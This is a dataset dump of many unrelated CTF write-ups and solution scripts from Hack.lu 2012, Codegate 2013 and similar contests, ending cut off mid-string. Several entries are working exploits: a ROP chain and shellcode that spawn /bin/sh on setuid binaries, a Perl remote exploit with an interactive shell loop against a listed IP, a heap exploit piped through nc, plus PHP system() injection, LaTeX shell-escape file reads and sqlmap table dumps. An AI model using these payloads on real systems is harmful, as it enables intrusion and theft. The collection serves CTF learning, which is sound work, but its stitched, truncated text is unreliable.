text_chunk
stringlengths
151
703k
Hack.lu 2012 Zombie-lockbox (200) Writeup by cutz ctf@zombie_lockbox:~$ file zombie-lockboxzombie-lockbox: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=0x85b329ae9ddc0039a4a3a7a0d42ed1098eda09c1, not stripped zombie-lockbox was also 32 bits, dynamically linked and did nothing but ask for a password to drop a shell if it is correct: ctf@zombie_lockbox:~$ ./zombie-lockboxZOMBIE AUTHENTICATION SYSTEM ONLY ZOMBIES MAY ENTERPassword: ASDASDYou are not allowed to enter!ctf@zombie_lockbox:~$ ctf@zombie_lockbox:~$ strings zombie-lockbox/lib/ld-linux.so.2__gmon_start__libc.so.6_IO_stdin_usedputs__stack_chk_failstdinprintffgetsexecvestrcmp__libc_start_main/lib/libcGLIBC_2.4GLIBC_2.0PTRhQVh$D$\1T$\e3UWVS[^_]z0mb1ez_haq_teh_sh1tZOMBIE AUTHENTICATION SYSTEM ONLY ZOMBIES MAY ENTERPassword:You are allowed to enter!/bin/shYou are not allowed to enter!;*2$" So one might think that z0mb1ez_haq_teh_sh1t is the correct password and it actually worksbut only if it looses its suidbit, for example under gdb: (gdb) rStarting program: /home/ctf/zombie-lockboxZOMBIE AUTHENTICATION SYSTEM ONLY ZOMBIES MAY ENTERPassword: z0mb1ez_haq_teh_sh1tYou are allowed to enter!process 30610 is executing new program: /bin/dashwarning: Selected architecture i386:x86-64 is not compatible with reported target architecture i386Architecture of file not recognized.(gdb) However, if you use ldd, you see that it used a different version of libc than all the other challenges: ctf@zombie_lockbox:~$ ldd zombie-lockbox linux-gate.so.1 => (0xf773f000) libc.so.6 => /lib/libc/libc.so.6 (0xf7596000) /lib/ld-linux.so.2 (0xf7740000)ctf@zombie_lockbox:~$ You could now either search for the hacked part inside that libc or simply diff it with the original one: ctf@zombie_lockbox:/tmp/cutz_STUFF$ strings /lib32/libc-2.15.so > 2ctf@zombie_lockbox:/tmp/cutz_STUFF$ strings /lib/libc/libc.so.6 > 1ctf@zombie_lockbox:/tmp/cutz_STUFF$ diff 1 23575,3579c3575,3578< @dlol_< @hz0mb< @l1ez_< @pc4nt< @t_haq---> JsX1> Js>1> Js$1> @+D$8643c8642< GNU C Library (Ubuntu EGLIBC 2.15-0ubuntu10.2) stable release version 2.15, by Roland McGrath et al.---> GNU C Library (Ubuntu EGLIBC 2.15-0ubuntu10.3) stable release version 2.15, by Roland McGrath et al.8649c8648< Compiled on a Linux 3.2.28 system on 2012-09-29.---> Compiled on a Linux 3.2.30 system on 2012-10-05. Strings are different so you can see the new password: lol_z0mb1ez_c4nt_haqIf you are interested: The hacked part of libc was the 2nd call inside of puts() (which actually is a strlen()): ctf@zombie_lockbox:/tmp/cutz_STUFF$ gdb /lib/libc/libc.so.6(gdb) disas putsDump of assembler code for function puts: 0x00067a30 <+0>: sub $0x3c,%esp 0x00067a33 <+3>: mov %ebx,0x2c(%esp) 0x00067a37 <+7>: mov 0x40(%esp),%eax 0x00067a3b <+11>: call 0x12a2e3 0x00067a40 <+16>: add $0x13b5b4,%ebx 0x00067a46 <+22>: mov %edi,0x34(%esp) 0x00067a4a <+26>: mov %ebp,0x38(%esp) 0x00067a4e <+30>: mov %eax,(%esp) 0x00067a51 <+33>: mov %esi,0x30(%esp) 0x00067a55 <+37>: call 0x7dff0(gdb) x/10i 0x7dff0 0x7dff0: nop ... 0x7e004: nop 0x7e005: cmp $0x8048708,%eax 0x7e00a: je 0x7e01a 0x7e00c: cmp $0x804874a,%eax 0x7e011: je 0x7e02e 0x7e013: cmp $0x804876c,%eax 0x7e018: je 0x7e034 0x7e01a: mov $0x31,%eax 0x7e01f: int $0x80 0x7e021: cmp $0x3e9,%eax(gdb) 0x7e026: je 0x7e03a 0x7e028: mov $0x35,%eax 0x7e02d: ret 0x7e02e: mov $0x19,%eax 0x7e033: ret 0x7e034: mov $0x1d,%eax 0x7e039: ret 0x7e03a: mov $0x8049ffc,%eax 0x7e03f: movl $0x5f6c6f6c,0x64(%eax) 0x7e046: movl $0x626d307a,0x68(%eax)(gdb) 0x7e04d: movl $0x5f7a6531,0x6c(%eax) 0x7e054: movl $0x746e3463,0x70(%eax) 0x7e05b: movl $0x7161685f,0x74(%eax) 0x7e062: mov $0x35,%eax 0x7e067: ret So finally: ctf@zombie_lockbox:~$ ./zombie-lockboxZOMBIE AUTHENTICATION SYSTEM ONLY ZOMBIES MAY ENTERPassword: lol_z0mb1ez_c4nt_haqYou are allowed to enter!$ cat FLAGGETEUID_YOU_NASTY_BITCH
<div id="form"><form method="POST" style=" width:900px; margin:auto;"><label for="name">Name<input type="text" id="name" name ="name"></label><label for="text">Text<textarea name="text" id="text"></textarea></label><label for="solution">Spam protection: 9-system('cat /6f170bcecda1ca8d3a5435591202988881b34bad')-9<input type="text" id="solution" name="solution"></label><input type="submit" id="submit" name="submit" value="Post"> <label for="name">Name<input type="text" id="name" name ="name"></label> <label for="text">Text<textarea name="text" id="text"></textarea></label> <label for="solution">Spam protection: 9-system('cat /6f170bcecda1ca8d3a5435591202988881b34bad')-9<input type="text" id="solution" name="solution"></label>
Hack.lu 2012 Braincpy (300) Writeup by cutzctf@braincpy:~$ file braincpybraincpy: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.9, not stripped Braincpy was an ELF, according to file 32 bits and statically linked. ctf@braincpy:~$ file braincpybraincpy: setuid setgid ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.9, not stripped Running it with a long argv[1] yielded in a direct strcpy() stackoverflow: (gdb) r `perl -e 'print "A"x96'`The program being debugged has been started already.Start it from the beginning? (y or n) y Starting program: /home/ctf/braincpy `perl -e 'print "A"x96'`NOMNOMNOM! Program received signal SIGSEGV, Segmentation fault.0x41414141 in ?? () However if we use more than 96 chars, which is exactly enough to smash EIP, it exits before the overflow can happen. ASLR and NX were activated, so you carefully had to choose your gadgets. I chose a nice ESP pivoting gadget with help of EBP at 0x080df815, so afterwards ESP would point backto the beginning of the buffer. There we had enough space to setuid(1001) and execve(/bin/sh).Exploit looked like this: #!/usr/bin/perl# hack.lu 2012 Braincpy exploit# run with ./braincpy "`perl expl.pl`"# cutz $payload = pack("I", 0x080dbc2c). # pop %ecxpack("I", 0x080d0a4e). # ptr-0xa => 1001 pack("I", 0x080dbfcf). # add $0xa(%ecx), %ebxpack("I", 0x080beb89). # pop %eaxpack("I", 0xffffffe9). # -23pack("I", 0x08054e7f). # neg %eaxpack("I", 0x0805b5c0). # int $0x80pack("I", 0x0805adec). # pop %edxpack("I", 0x080e4701). # +wpack("I", 0x080beb89). # pop %eax"//sh".pack("I", 0x080dbc2c). # pop %ecx "/bin".pack("I", 0x08048c0c). # mov %ecx, $0x14(%edx) ; mov %ebp, $0xc(%edx) ; mov %eax, $0x18(%edx)pack("I", 0x0805ae15). # pop %edx, pop %ecx, pop %ebxpack("I", 0x080e4701). # 0pack("I", 0x080e4701). # 0pack("I", 0x080e4715). # +w + 0x14pack("I", 0x080beb89). # pop %eaxpack("I", 0xfffffff5). # -11pack("I", 0x08054e7f). # neg %eaxpack("I", 0x0805b5c0). # int $0x80pack("I", 0x08086c12). # ptr-0xa => 0xffffffa0pack("I", 0x080df815); # add $0xa(%ebp), %esp print $payload So: ctf@braincpy:~$ ./braincpy "`perl /tmp/cutz_STUFF/expl.pl`"$ cat FLAGROP_GOLF_IS_A_NICE_GAME
#!/bin/python # exploit write up - pwnables 200 Defcon 20 CTF# by @_g05u_ NULL Life FTW! import socket, struct #jump to shellcode in stackret = struct.pack("
Misc 200 Task:There are rumors that Lamevich could be a spy.. Check it please, maybe you could find something in the "Very Brown Square"...I used Stegsolv.Open the file "square.gif".Click "<" button twice.So, the flag can be seen.So easy, isn't it?41306ef63420760771deff1a0db76888
Fire up gdb and start snooping around in the binary. To our luck, the ELF still has debugging symbols, so all of the function calls have obvious names.
23 - Spambot The zombies are planning an invasion. But before they can start they want to scare the people by sending scary messages. Because zombies are not able to write letters they've developed a platform which automatically submits messages to guestbooks or comment platforms. A careless zombie lost his note about the spambot. So we found the URL of it. https://ctf.fluxfingers.net:2075/spambot/ Stop them! Write-up : http://xelenonz.blogspot.com/2012/10/hacklu-spambot-200-pt.html
I reverse engineered the binary to find the encoding function, converted it to Python, and verified correctness. I then wasted a bunch of time making an iterative bruteforcer, until I realized that the encoding function is basically equivalent to: bits('RTFM') + tab[buf[0]] + '00' + tab[buf[1]] + '00' + ... + tab[buf[n]] where tab is a mapping from ascii characters to variable-length bitstrings, with the important property that they start and end with 1s, and contain no 00s. (match /^1.*1$/ but not /00/) After that, decoding is simple.
We were ready to deobfuscate JavaScript, but there wasn't need to do it.We just opened the link in Firefox with Firebug enabled. In the <body> element we saw:<div id="a" data-a="function dafug(){if (prompt("Lets eat some ...?")=="tasty brainz")alert("Flag: tasty_humans_all_day_erry_day"); };"></div>So, we got this flag ;)
#!/usr/bin/perl# codegate2013 vuln400 exploit# cutz## $ (perl expl_vuln400.pl;cat) | nc 58.229.122.20 6666# _______________________________ # /==============================/ # | Onetime Board Console | # /------------------------------/ # | | WELCOME | | # |__________|_________|_________| # | W a i t | # ++++++++++++++++++++++++++++++++ # .....# => Author : Title : # 1. delete 2. modify 3. reply 4. back# => id# uid=1000(onetime) gid=1000(onetime) groups=1000(onetime)# cd /home/onetime # ls# key.txt# onetime# cat key.txt# U_g0t_M4_Buddy_write("YOLO", "YOLO", "A"x36 . pack("I", 0x80487c4) . "A"x604 . pack("I", 0x80487c4) . "\x30\x86\x04\x08"x80) for 1 .. 7;for (1 .. 7) { _read($_); _reply("YOLO") for 1 .. 127; _back(); _back();}for (2 .. 6) { _read($_); _delete(); _back(); _back();}_write("YOLO", "YOLO", "YOLO") for 1 .. 2;_read(8);_reply("sh") for 1 .. 127;_modify("A", "B");_delete();_exit();sub _read{ $num = shift; $cmd = "2\n" . "$num\n"; print($cmd);}sub _delete{ $cmd = "1\n"; print($cmd);}sub _modify{ $author = shift; $title = shift; $cmd = "2\n" . "$author\n" . "$title\n"; print($cmd);}sub _reply{ $msg = shift; $cmd = "3\n" . "$msg\n"; print($cmd);}sub _back{ $cmd = "4\n"; print($cmd);}sub _exit{ $cmd = "3\n"; print($cmd);}sub _write{ $author = shift; $title = shift; $content = shift; $cmd = "1\n". "$author\n". "$title\n". "$content\n"; print($cmd);}sub print{ $cmd = shift; open F, ">$file"; print F $cmd; close F;}
There was no clear goal given in the challenge description text (as guessing was the key skill needed in this CTF), so we decided to just poke around on the website. We immediately got an error message urging us to use a mobile browser. Given the clear affinity of the CTF hosts twoards iPhones, we just changed our User-agent to "iPhone" (using general.useragent.override in about:config) which worked quite nicely.The site was a well-built "game simulator" simulating awesome + and - Buttons to increase and decrease your stats. Additionally, saving a memo was possible, too! Overwhelmed by the functionality of the site, we quickly discovered the main.js file which contained some automatically obfuscated JavaScript. Jsbeautifier.org returned unobfuscated code revealing that links are built clientside and probably verified serverside (a kind of HMAC - just badly implemented). The p-Parameter contains the file that should be loaded and the s-Parameter contains the following: calcSHA1(page + "Ace in the Hole");Too lazy to reimplement this complex (!!) operation in Python, we just opened the Firebug console and since calcSHA1 leaked to the global window object, we could just create our links directly in the browser. Trying to load index.php got us uninterpreted PHP-Code. Nice. So... what's the goal of the challenge again? After a short visit to the IRC just to flame about the unclear descriptions we loaded the simulator.php-file and noticed these lines:if ($_POST['name'] == "GM") die("you can not view&amp;save with 'GM'");if (isset($_POST['name'])) $_SESSION['scrap']=$_POST['name'];$db = sqlite_open("/var/game_db/gamesim_".$_SESSION['scrap'].".db");So, GM is the thing we want to have in the name-Parameter? Let's give it a try: Using "/../gamesim_GM" as the name lets us bypass the if-condition and loads the file "/var/game_db/gamesim_/../gamesim_GM.db" which works nicely because entering a non-existent path and leaving it with "../" will not result in an error (due to normalization?). And this was it. The flag was waiting in the memo field for us. 500 Points for the flag "W3LC0M3_T0_L0L0L0L" left us wondering why so few teams solved that challenge which was not harder than any of the other web-challenges.
\documentclass{article} \begingroup\makeatletter\endlinechar=\m@ne\everyeof{\noexpand}\edef\x{\endgroup\def\noexpand\TeXpath{\@@input"/home/awesker/cure" }}\x \begin{document} {\catcode`_=12 \ttfamily@@\input{|"ls /home/awesker/" } } \TeX{} is \TeXpath\end{document}
# codegate2013 bin100 solution# cutzusing System;using System.Text;using System.Security.Cryptography;namespace test{ class Program { public static string KeyValue = "9e2ea73295c7201c5ccd044477228527"; public static byte[] d = new byte[] { 0x3f, 30, 0x39, 0x2f, 20, 0x4e, 50, 0x36, 0x33, 5, 0x25, 0x29, 0x52, 40, 0x45, 30, 0x2a, 0x38, 0x24, 0x49, 60, 0x44, 0x4f, 0x56, 0x18, 0x49, 0x4c, 0x13, 9, 0x1b, 0x2a, 4, 0x52, 0x2a, 0x1c, 0x56, 0x4f, 11, 0x11, 0x3f, 0x17, 14, 0x30, 0x40 }; public static void Main(string[] args) { Console.WriteLine("Flag: " + Decrypt(StringToXOR(ByteTostring_t(d)), KeyValue)); Console.ReadKey(true); } public static string StringToXOR(string data) { byte[] bt = new byte[data.Length]; bt = stringTobyte(data); for (int i = 0; i < bt.Length; i++) { bt[i] = (byte) (bt[i] ^ 0x25); bt[i] = (byte) (bt[i] ^ 0x58); } return ByteTostring(bt); } public static string ByteTostring(byte[] bt) { string str = ""; for (int i = 0; i < bt.Length; i++) { str = str + Encoding.Default.GetString(bt, i, 1); } return str; } public static byte[] stringTobyte(string str) { return Encoding.UTF8.GetBytes(str.ToCharArray()); } public static string Decrypt(string textToDecrypt, string key) { RijndaelManaged managed = new RijndaelManaged { Mode = CipherMode.CBC, Padding = PaddingMode.PKCS7, KeySize = 0x100, BlockSize = 0x100 }; byte[] inputBuffer = Convert.FromBase64String(textToDecrypt); byte[] bytes = Encoding.UTF8.GetBytes(key); byte[] destinationArray = new byte[0x20]; int length = bytes.Length; Array.Copy(bytes, destinationArray, length); managed.Key = destinationArray; managed.IV = destinationArray; byte[] buffer4 = managed.CreateDecryptor().TransformFinalBlock(inputBuffer, 0, inputBuffer.Length); return Encoding.UTF8.GetString(buffer4); } public static string ByteTostring_t(byte[] buf) { return Encoding.UTF8.GetString(buf); } }}
<span>In The Name Of GOD;)hi my bro's;)It is very easy</span>:Dq parameters is injectable:Duse sqlmap for inject:D<< sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --tables >>dump tables:Dflagsusersdump flags table with command:<< sqlmap.py -u http://backdoor-problems.cognizance.org.in/web200/submit.php --data q=a -p q --threads 10 --sql-query="select * from flags" >>get flag:Pgood luck;)
Dethstarr was one of my favorite service exploitation challenges during the SecuInside 2012 contest. We had to fully reverse a given binary to understand how the protocol it implements works. To be able to debug the binary easily and in the same environment as on the remote server...
#!/usr/bin/perl# codegate2013 vuln200 exploit# cutz# # perl expl_vuln200.pl 58.229.122.19 7777# [x] exploit successfull# $ id# uid=1001(codegate2013) gid=1001(codegate2013) groups=1001(codegate2013)# $ ls# dump.txt# key# logs# pwn2# $ cat key# Key is "This_is_C0G6ESTYL3!_:)"use strict;use warnings;use IO::Socket;$|++;my $ip = shift;my $port = shift;my $sock;my $buf;$sock = new IO::Socket::INET ( PeerAddr => $ip, PeerPort => $port, Proto => 'tcp', ) or die "Conn failed", $/;sysread $sock, $buf, 1024, 0;my $payload = "write" ."A"x240 . pack("I", 0x08048780) .pack("I", 0x0804c000) .pack("I", 0x00000004) .pack("I", 0x0804c000) .pack("I", 0x00000100) .pack("I", 0x00000000);print $sock $payload;select undef, undef, undef, 0.101;print $sock"\x31\xc9\x6a\x3f\x58\x6a\x04\x5b\xcd\x80" ."\x41\x83\xf9\x03\x75\xf2\x6a\x0b\x58\x99" ."\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69" ."\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80";sysread $sock, $buf, 1024, 0;print $sock "echo EXPLOITED", $/;sysread $sock, $buf, 1024, 0;sysread $sock, $buf, 1024, 0;if ($buf =~ /^EXPLOITED/) { print "[x] exploit successfull", $/;} else { print "[x] failed", $/; close $sock; exit;}my $cmd; while (1) { print "\$ "; $cmd = <>; print $sock $cmd; sysread $sock, $buf, 1024, 0; print $buf;}close $sock;
package main import "crypto/aes"import "fmt"import "encoding/hex" var start = []byte("AES-256 ECB mode twice, two keys")var end = []byte("\x4c\x76\xe9\x07\x86\xc4\xf3\x64\x6a\xdf\x99\x21\x7a\x64\xd0\xd7\x49\xed\xc5\x9f\x2c\x7f\xbb\x36\x58\xaf\x04\xaf\x07\x1d\x0c\x47") var reverse = make(map[string][32]byte) func main() { var keys[1<<24][32]byte for i := 0; i < 1<<24; i++ { keys[i][29] = byte(i & 0xff); keys[i][30] = byte((i >> 8) & 0xff); keys[i][31] = byte((i >> 16) & 0xff); } for i := 0; i < 1<<24; i++ { b, _ := aes.NewCipher(keys[i][:]) dest := make([]byte, 16) b.Encrypt(dest, start[:16]) reverse[hex.EncodeToString(dest)] = keys[i] } fmt.Println("Encoded all the things") for i := 0; i < 1<<24; i++ { b, _ := aes.NewCipher(keys[i][:]) dest := make([]byte, 16) b.Decrypt(dest, end[:16]) if v, ok := reverse[hex.EncodeToString(dest)]; ok { fmt.Println(hex.EncodeToString(v[:])) fmt.Println(hex.EncodeToString(keys[i][:])) return } }}
~~~THE TASK~~~ Zombies got communication-problems because of their heterogeneity, so they defined a standard for their communication. We need to know how to decrypt their messages in order to successfully defeat them. Luckily, a friend of mine found one of those encrypted messages: 0x1be15dc 77676058612 03062372 676 0x9542 0x2546c9ec 02614610 0x3b3154e5a0a923ff Hint: uppercase seems legit. credits: 100 +3 (1st), +2 (2nd), +1 (3rd) ~~~THE SOLUTION~~~ We see here some words, which are represented by 16-, 10- and 8-digit integers.Let's transform these integers, so each of them would be 36-digit. So, we get: 17 14 21 21 2435 24 22 11 18 14 2817 14 27 1418 28 29 17 14 10 12 12 14 28 28 15 21 10 1632 14 21 24 31 14 11 27 10 18 24 0 Each of the 'digits' may represent a digit (0-9) or an uppercase letter (A-Z). We know, that uppercase letters are legit. So, we try to find out the correspondence between our 'digits' and these letters. We suppose that the first string is HELLO, so we get: H - 17E - 14L - 21O - 24 We also think about rather a rare combination of double letters 10 12 12 14 28 28 and this appears to be ACCESS. So: A - 10C - 12S - 28 Finally, we see, that each letter corresponds to the number 9+i where i is the place of this latter in the alphabet. The whole message is: HELLOZOMBIESHEREIS THE ACCESSFLAGWELOVEBRAIN0 (the final zero is strange). We try WELOVEBRAIN0 and WELOVEBRAIN, but get a mistake. After a few attempts we find out that the flag is WELOVEBRAINZ.
#!/usr/bin/python from z3 import * data = [ord(c) for c in "".join(["\x00\x3F\x60\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E\xFF\x7E\x7F\x7F","\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF\x7C\x5C\xFF\x7C","\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B\x7B\xFF\x7A\x5A","\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A\x7A\x59\x79\xFF","\x78\x58\xFF\x78\x79\x79\x58\x78\xFF\x77\x57\xFF\x77\x78\x78\x57","\x77\xFF\x76\x56\xFF\x76\x77\x77\x56\x76\xFF\x75\x55\xFF\x75\x76","\x76\x55\x75\xFF\x74\x54\xFF\x74\x75\x75\x54\x74\xFF\x73\x53\xFF","\x73\x74\x74\x53\x73\xFF\x72\x52\xFF\x72\x73\x73\x52\x72\xFF\x71","\x51\xFF\x71\x72\x72\x51\x71\xFF\x70\x50\xFF\x70\x71\x71\x50\x70","\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E\xFF\x6E\x6F\x6F","\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF\x6C\x4C\xFF\x6C","\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B\x6B\xFF\x6A\x4A","\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A\x6A\x49\x69\xFF","\x68\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF\x67\x68\x68\x47","\x67\xFF\x66\x46\xFF\x66\x67\x67\x46\x66\xFF\x65\x45\xFF\x65\x66","\x66\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64\xFF\x63\x43\xFF","\x63\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63\x42\x62\xFF\x61","\x41\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61\x40\x62\x41\x61","\xFF\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63\xFF\x63\x42\x64","\x43\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF\x64\x65\xFF\x65","\x44\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46\x66\xFF\x66\x67","\xFF\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47\x69\x48\x68\xFF","\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF\x6A\x49\x6B\x4A","\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B\x6C\xFF\x6C\x4B","\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D\xFF\x6D\x6E\xFF","\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF\x6F\x4E\x70\x4F\x6F\xFF\x6F","\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70\x71\xFF\x71\x50\x72\x51\x71","\xFF\x71\x72\xFF\x72\x51\x73\x52\x72\xFF\x72\x73\xFF\x73\x52\x74","\x53\x73\xFF\x73\x74\xFF\x74\x53\x75\x54\x74\xFF\x74\x75\xFF\x75","\x54\x76\x55\x75\xFF\x75\x76\xFF\x76\x55\x77\x56\x76\xFF\x76\x77","\xFF\x77\x56\x78\x57\x77\xFF\x77\x78\xFF\x78\x57\x79\x58\x78\xFF","\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF\x79\x7A\xFF\x7A\x59\x7B\x5A","\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B\x7B\xFF\x7B\x7C\xFF\x7C\x5B","\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C\x7E\x5D\x7D\xFF\x7D\x7E\xFF","\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF\x7F\x5E\xFF\x5F\x7F\x00\x3F","\x60\xFF\x40\x00\x01\x3E\x60\x01\x3F\x61\xFF\x7F\x5F\xFF\x5F\x7F","\xFF\x7E\x5E\xFF\x7E\x7F\x7F\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E","\x5D\x7D\xFF\x7C\x5C\xFF\x7C\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B","\x7C\x7C\x5B\x7B\xFF\x7A\x5A\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59","\xFF\x79\x7A\x7A\x59\x79\xFF\x78\x58\xFF\x78\x79\x79\x58\x78\xFF","\x77\x57\xFF\x77\x78\x78\x57\x77\xFF\x76\x56\xFF\x76\x77\x77\x56","\x76\xFF\x75\x55\xFF\x75\x76\x76\x55\x75\xFF\x74\x54\xFF\x74\x75","\x75\x54\x74\xFF\x73\x53\xFF\x73\x74\x74\x53\x73\xFF\x72\x52\xFF","\x72\x73\x73\x52\x72\xFF\x71\x51\xFF\x71\x72\x72\x51\x71\xFF\x70","\x50\xFF\x70\x71\x71\x50\x70\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F","\xFF\x6E\x4E\xFF\x6E\x6F\x6F\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E","\x4D\x6D\xFF\x6C\x4C\xFF\x6C\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B","\x6C\x6C\x4B\x6B\xFF\x6A\x4A\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49","\xFF\x69\x6A\x6A\x49\x69\xFF\x68\x48\xFF\x68\x69\x69\x48\x68\xFF","\x67\x47\xFF\x67\x68\x68\x47\x67\xFF\x66\x46\xFF\x66\x67\x67\x46","\x66\xFF\x65\x45\xFF\x65\x66\x66\x45\x65\xFF\x64\x44\xFF\x64\x65","\x65\x44\x64\xFF\x63\x43\xFF\x63\x64\x64\x43\x63\xFF\x62\x42\xFF","\x62\x63\x63\x42\x62\xFF\x61\x41\xFF\x61\x62\x62\x41\x61\xFF\x60","\x40\xFF\x61\x40\x62\x41\x61\xFF\x61\x62\xFF\x62\x41\x63\x42\x62","\xFF\x62\x63\xFF\x63\x42\x64\x43\x63\xFF\x63\x64\xFF\x64\x43\x65","\x44\x64\xFF\x64\x65\xFF\x65\x44\x66\x45\x65\xFF\x65\x66\xFF\x66","\x45\x67\x46\x66\xFF\x66\x67\xFF\x67\x46\x68\x47\x67\xFF\x67\x68","\xFF\x68\x47\x69\x48\x68\xFF\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF","\x69\x6A\xFF\x6A\x49\x6B\x4A\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B","\x6B\xFF\x6B\x6C\xFF\x6C\x4B\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C","\x6E\x4D\x6D\xFF\x6D\x6E\xFF\x6E\x4D\x6F\x4E\x6E\xFF\x6E\x6F\xFF","\x6F\x4E\x70\x4F\x6F\xFF\x6F\x70\xFF\x70\x4F\x71\x50\x70\xFF\x70","\x71\xFF\x71\x50\x72\x51\x71\xFF\x71\x72\xFF\x72\x51\x73\x52\x72","\xFF\x72\x73\xFF\x73\x52\x74\x53\x73\xFF\x73\x74\xFF\x74\x53\x75","\x54\x74\xFF\x74\x75\xFF\x75\x54\x76\x55\x75\xFF\x75\x76\xFF\x76","\x55\x77\x56\x76\xFF\x76\x77\xFF\x77\x56\x78\x57\x77\xFF\x77\x78","\xFF\x78\x57\x79\x58\x78\xFF\x78\x79\xFF\x79\x58\x7A\x59\x79\xFF","\x79\x7A\xFF\x7A\x59\x7B\x5A\x7A\xFF\x7A\x7B\xFF\x7B\x5A\x7C\x5B","\x7B\xFF\x7B\x7C\xFF\x7C\x5B\x7D\x5C\x7C\xFF\x7C\x7D\xFF\x7D\x5C","\x7E\x5D\x7D\xFF\x7D\x7E\xFF\x7E\x5D\x7F\x5E\x7E\xFF\x7E\x7F\xFF","\x7F\x5E\xFF\x5F\x7F\x01\x3E\x60\x01\x3F\x61\xFF\x41\x01\x02\x3D","\x60\x02\x3E\x61\x02\x3F\x62\xFF\x7F\x5F\xFF\x5F\x7F\xFF\x7E\x5E","\xFF\x7E\x7F\x7F\x5E\x7E\xFF\x7D\x5D\xFF\x7D\x7E\x7E\x5D\x7D\xFF","\x7C\x5C\xFF\x7C\x7D\x7D\x5C\x7C\xFF\x7B\x5B\xFF\x7B\x7C\x7C\x5B","\x7B\xFF\x7A\x5A\xFF\x7A\x7B\x7B\x5A\x7A\xFF\x79\x59\xFF\x79\x7A","\x7A\x59\x79\xFF\x78\x58\xFF\x78\x79\x79\x58\x78\xFF\x77\x57\xFF","\x77\x78\x78\x57\x77\xFF\x76\x56\xFF\x76\x77\x77\x56\x76\xFF\x75","\x55\xFF\x75\x76\x76\x55\x75\xFF\x74\x54\xFF\x74\x75\x75\x54\x74","\xFF\x73\x53\xFF\x73\x74\x74\x53\x73\xFF\x72\x52\xFF\x72\x73\x73","\x52\x72\xFF\x71\x51\xFF\x71\x72\x72\x51\x71\xFF\x70\x50\xFF\x70","\x71\x71\x50\x70\xFF\x6F\x4F\xFF\x6F\x70\x70\x4F\x6F\xFF\x6E\x4E","\xFF\x6E\x6F\x6F\x4E\x6E\xFF\x6D\x4D\xFF\x6D\x6E\x6E\x4D\x6D\xFF","\x6C\x4C\xFF\x6C\x6D\x6D\x4C\x6C\xFF\x6B\x4B\xFF\x6B\x6C\x6C\x4B","\x6B\xFF\x6A\x4A\xFF\x6A\x6B\x6B\x4A\x6A\xFF\x69\x49\xFF\x69\x6A","\x6A\x49\x69\xFF\x68\x48\xFF\x68\x69\x69\x48\x68\xFF\x67\x47\xFF","\x67\x68\x68\x47\x67\xFF\x66\x46\xFF\x66\x67\x67\x46\x66\xFF\x65","\x45\xFF\x65\x66\x66\x45\x65\xFF\x64\x44\xFF\x64\x65\x65\x44\x64","\xFF\x63\x43\xFF\x63\x64\x64\x43\x63\xFF\x62\x42\xFF\x62\x63\x63","\x42\x62\xFF\x61\x41\xFF\x61\x62\x62\x41\x61\xFF\x60\x40\xFF\x61","\x40\x62\x41\x61\xFF\x61\x62\xFF\x62\x41\x63\x42\x62\xFF\x62\x63","\xFF\x63\x42\x64\x43\x63\xFF\x63\x64\xFF\x64\x43\x65\x44\x64\xFF","\x64\x65\xFF\x65\x44\x66\x45\x65\xFF\x65\x66\xFF\x66\x45\x67\x46","\x66\xFF\x66\x67\xFF\x67\x46\x68\x47\x67\xFF\x67\x68\xFF\x68\x47","\x69\x48\x68\xFF\x68\x69\xFF\x69\x48\x6A\x49\x69\xFF\x69\x6A\xFF","\x6A\x49\x6B\x4A\x6A\xFF\x6A\x6B\xFF\x6B\x4A\x6C\x4B\x6B\xFF\x6B","\x6C\xFF\x6C\x4B\x6D\x4C\x6C\xFF\x6C\x6D\xFF\x6D\x4C\x6E\x4D\x6D","\xFF\x6D\x6E\xFF\x6E\